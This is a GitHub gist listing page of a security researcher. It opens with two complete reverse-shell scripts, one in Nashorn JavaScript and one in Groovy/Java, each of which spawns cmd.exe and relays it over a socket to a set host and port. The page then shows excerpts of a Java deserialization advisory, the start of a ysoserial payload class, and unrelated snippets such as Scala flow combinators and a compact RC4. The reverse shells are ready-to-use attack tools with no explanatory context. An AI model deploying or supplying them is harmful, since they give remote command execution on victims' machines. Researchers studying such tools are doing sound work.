Skip to content

Instantly share code, notes, and snippets.

Chris Frohoff frohoff

  • San Diego, CA
Block or report user

Report or block frohoff

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@frohoff
frohoff / revsh.js
Created Mar 22, 2016
Nashorn Javascript Reverse Shell
View revsh.js
var host="localhost";
var port=8044;
var cmd="cmd.exe";
var p=new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();var s=new java.net.Socket(host,port);var pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();var po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();java.lang.Thread.sleep(50);try {p.exitValue();break;}catch (e){}};p.destroy();s.close();
@frohoff
frohoff / revsh.groovy
Created Mar 2, 2016
Pure Groovy/Java Reverse Shell
View revsh.groovy
String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
@frohoff
frohoff / JAVA-ADVISORY.md
Last active Sep 5, 2019
Java 7u21 Security Advisory
View JAVA-ADVISORY.md

Security Advisory – Java SE

Chris Frohoff – Qualcomm Information Security and Risk Management

Introduction

  • Affected Product(s): Java SE 6, Java SE 7
  • Fixed in: Java SE 7u25 (2013-06-18), Java SE 8 (2014-03-18)
  • Vendor Contact: secalert_us@oracle.com
  • Vulnerability Type: Unsafe Object Deserialization
View CommonsBeanutilsCollectionsLogging1.java
package ysoserial.payloads;
import java.math.BigInteger;
import java.util.Arrays;
import java.util.PriorityQueue;
import java.util.Queue;
import org.apache.commons.beanutils.BeanComparator;
import ysoserial.payloads.annotation.Dependencies;
View mdexec.rb
#!/usr/bin/env ruby
require 'open3'
def replace(md, strip=false)
rex = /```([a-zA-Z]+)\n(([^`\n]{3,}\n)*)```\s*```mdexec\n([^`\n]{3,}\n)*```/
replaced = md.gsub(rex) do |rep|
int, code = $1, $2
if !strip
@frohoff
frohoff / gist:db15cb9244e5a6184ab3
Created May 7, 2015
functional composition flow
View gist:db15cb9244e5a6184ab3
object Test extends App {
lazy val flow: SplunkEvent => Seq[Email[Alert]] =
receiveEvent andTap rawTap andThen
convertToSecurityEvent andMaybeTap eventTap andMaybe
classifyIfTrained andMaybeTap classificationTap andMaybeSeq
aggregateByTimeWindow andForEach (_.sortBy(_.event.time)) andForEach
convertToAlert andForEachTap alertTap andForEachOpt
createEmail andForEachTap emailTap
}
@frohoff
frohoff / Flow.scala
Last active Aug 29, 2015
monadish reactive flow combinators
View Flow.scala
package org.frohoff.flow
import scala.collection.mutable.Buffer
import Flow._
object Test extends App {
val f: Flow[Int,Int] = Flow[Int]
val f2: Flow[Int,String] = f.map(_.toHexString)
val f3: Flow[Int,Option[Int]] = f.map(Option(_))
//f3.flatten // doesn't compile yet
@frohoff
frohoff / terse-rc4.rb
Last active Aug 29, 2015
terse ruby rc4 (161 chars, 154 chars not counting proc/param overhead) for https://twitter.com/matthew_d_green/status/524966294492577792
View terse-rc4.rb
->t,k{s=*0..255;j=0;m=256;m.times{|i|j=(j+s[i]+k[i%k.size])%m;s[i],s[j]=s[j],s[i]};i=j=0;t.map{|b|i=(i+1)%m;j=(j+s[i])%m;s[i],s[j]=s[j],s[i];b^s[(s[i]+s[j])%m]}}
View nullsafe.scala
object NullSafeConversions {
implicit def ns[A](a:A) = new NullSafe(a)
implicit def ro[A](o:Option[A]) = new RichOption(o)
def ?[A](a:A) = if (a == null) Some(a) else None
case class NullSafe[A](a:A) extends AnyVal {
def ?[B >: Null](f: A => B):B = if (a != null) f(a) else null
}
case class RichOption[A](o:Option[A]) extends AnyVal {
@frohoff
frohoff / longchaintest.js
Last active Aug 29, 2015
long stream chain test
View longchaintest.js
var crypto = require('crypto')
var hashType = process.argv[2] || 'sha1'
var numHashes = parseInt(process.argv[3] || 1)
// init chain with stdout
var piped = process.stdout
for (var i = 0; i < numHashes; i++) {
// prepend chain with new hash
You can’t perform that action at this time.